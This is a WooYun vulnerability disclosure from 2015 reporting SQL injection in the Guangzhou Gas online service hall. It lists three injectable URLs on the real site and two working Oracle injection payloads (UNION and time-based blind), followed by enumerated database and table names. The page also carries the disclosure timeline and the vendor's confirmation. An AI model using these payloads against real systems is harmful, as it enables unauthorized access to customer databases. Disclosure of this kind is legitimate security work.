当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0123028

漏洞标题:广州燃气网上营业厅SQL注入漏洞

相关厂商:国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-06-27 00:19

修复时间:2015-08-15 14:14

公开时间:2015-08-15 14:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-27: 细节已通知厂商并且等待厂商处理中
2015-07-01: 厂商已经确认,细节仅向厂商公开
2015-07-11: 细节向核心白帽子及相关领域专家公开
2015-07-21: 细节向普通白帽子公开
2015-07-31: 细节向实习白帽子公开
2015-08-15: 细节向公众公开

简要描述:

广州燃气网上营业厅SQL注入漏洞

详细说明:

多处注入:
如:http://www.gz96833.com/comqnaList.action?dictid=1&flag=1
http://www.gz96833.com/useGasTypeList.action?dictid=1&flag=1
http://www.gz96833.com/useGasTypeListView.action?fid=326&typeid=2&detailid=
以第一处为例:

Place: GET
Parameter: dictid
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: dictid=1' UNION ALL SELECT NULL,CHR(58)||CHR(106)||CHR(120)||CHR(10
1)||CHR(58)||CHR(101)||CHR(66)||CHR(117)||CHR(68)||CHR(80)||CHR(66)||CHR(122)||C
HR(88)||CHR(108)||CHR(101)||CHR(58)||CHR(115)||CHR(108)||CHR(122)||CHR(58),NULL,
NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- &flag=1
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: dictid=1' AND 9087=DBMS_PIPE.RECEIVE_MESSAGE(CHR(87)||CHR(72)||CHR(
72)||CHR(76),5) AND 'iPLE'='iPLE&flag=1
---


11.png


25个数据库:

available databases [25]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] GRKH
[*] HR
[*] IX
[*] JSZX
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] REPFILL
[*] REPMGM
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] WT
[*] XDB


毕竟省级网上营业厅了。
随意一个数据库表信息:

Database: WT
[137 tables]
+--------------------------------+
| AC_APPLICATION |
| AC_DATASCOPE |
| AC_ENTITY |
| AC_ENTITYFIELD |
| AC_ENTITYFIELDROLE |
| AC_ENTITYROLE |
| AC_FUNCGROUP |
| AC_FUNCRESOURCE |
| AC_FUNCTION |
| AC_IDENTITY |
| AC_IDENTITYRES |
| AC_MENU |
| AC_OPERATOR |
| AC_OPERATORROLE |
| AC_OPERCONFIG |
| AC_OPERCUSTMENU |
| AC_OPERFUNC |
| AC_OPERSHORTCUT |
| AC_ROLE |
| AC_ROLEDATAPRIV |
| AC_ROLEFUNC |
| AT_DATACHOOSE |
| AT_FILEUPLOAD |
| AT_LOGIN_POLICY |
| AT_OPERLOG |
| AT_OPERLOGCONFIG |
| AT_OPERLOGHIS |
| AT_PORTALRESLIST |
| AT_RESTRICTION |
| AT_SYSTEM_PARAM |
| CZ_BIZATTACH |
| CZ_PREPARTICIPANT |
| CZ_RULEATTACH |
| CZ_SMSTASK |
| CZ_WFBIZ |
| CZ_WFCONFIG |
| CZ_WFNODEDATA |
| CZ_WORKDAY |
| EOS_DICT_ENTRY |
| EOS_DICT_ENTRY_I18N |
| EOS_DICT_TYPE |
| EOS_DICT_TYPE_I18N |
| EOS_QRTZ_BLOB_TRIGGERS |
| EOS_QRTZ_CALENDARS |
| EOS_QRTZ_CRON_TRIGGERS |
| EOS_QRTZ_FIRED_TRIGGERS |
| EOS_QRTZ_JOB_DETAILS |
| EOS_QRTZ_JOB_LISTENERS |
| EOS_QRTZ_LOCKS |
| EOS_QRTZ_PAUSED_TRIGGER_GRPS |
| EOS_QRTZ_SCHEDULER_STATE |
| EOS_QRTZ_SIMPLE_TRIGGERS |
| EOS_QRTZ_TRIGGERS |
| EOS_QRTZ_TRIGGER_LISTENERS |
| EOS_SERVICE_ENDPOINT |
| EOS_UNIQUE_TABLE |
| GR_CERTINFO |
| GR_COMPROBLEM |
| GR_COMREMARK |
| GR_ELECTRONICBILLCFG |
| GR_ELECTRONICBILLLOG |
| GR_FEESTANDARD |
| GR_FEESTANDARD_20111104 |
| GR_FEESTANDARD_20150514 |
| GR_IMPORTANTNOTE |
| GR_LANMUIP |
| GR_LANMUUSES |
| GR_ORDER |
| GR_ORDERINFO |
| GR_SAFEHIDDENDANGER_DICTIONARY |
| GR_SAFEUSEGAS |
| GR_SERVICEGUIDE |
| GR_SERVICEGUIDEATTACH |
| GR_TEMP_USER |
| GR_TEMP_USER_YAN |
| GR_USERLOGINLOG |
| GR_WORKORDER_SECOND_TYPE |
| GR_WORKORDER_THIRD_TYPE |
| GR_WORKORDER_TYPE |
| GR_WTCASEWORK |
| GR_WTCBWATCH |
| GR_WTCONFIG |
| GR_WTCUSTOMER |
| GR_WTCUSTOMERLOG |
| GR_WTCUSTOMER_20150526 |
| GR_WTCUSTOMER_BAK20130104 |
| GR_WTCUSTOMER_BAK20130318BYZQZ |
| GR_WTCUSTORMERLOG |
| GR_WTGASTRY |
| GR_WTSAFEINSPECT |
| GR_WTUSEEFFECT |
| OM_APPGROUP |
| OM_APPPOSI |
| OM_BUSIORG |
| OM_DUTY |
| OM_EMPGROUP |
| OM_EMPLOYEE |
| OM_EMPORG |
| OM_EMPPOSITION |
| OM_GROUP |
| OM_GROUPPOSI |
| OM_ORGANIZATION |
| OM_PARTYROLE |
| OM_POSITION |
| O_CONTACTS |
| O_OPERATOR |
| O_ORG |
| SMS_MUBAN |
| SMS_SEND_MX |
| TBL_RESOURCES |
| TBL_ROLES |
| TBL_ROLES_RESOURCES |
| TBL_USERS |
| TBL_USERS_ROLES |
| T_CUSTOMER |
| WFACTIVITYINST |
| WFAGENT |
| WFAGENTITEM |
| WFAGENTSCOPE |
| WFAUDITRECORD |
| WFPERSONINFO |
| WFPROCESSDEFINE |
| WFPROCESSINST |
| WFPROCESSINSTATTR |
| WFSYSTEMINFO |
| WFTIMER |
| WFTRANSCTRL |
| WFTRANSITION |
| WFWIPARTICIPANT |
| WFWORKITEM |
| WF_H_ACTIVITYINST |
| WF_H_PROCESSINST |
| WF_H_PROCESSINSTATTR |
| WF_H_TRANSCTRL |
| WF_H_TRANSITION |
| WF_H_WIPARTICIPANT |
| WF_H_WORKITEM |
+--------------------------------+


数据众多,不再枚举!

漏洞证明:

如上所述!

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-07-01 14:12

厂商回复:

非常感谢您的报告。
报告中的问题已确认并复现.
影响的数据:高
攻击成本:低
造成影响:高
综合评级为:高,rank:10
正在联系相关网站管理单位处置。

最新状态:

暂无


漏洞评价:

评论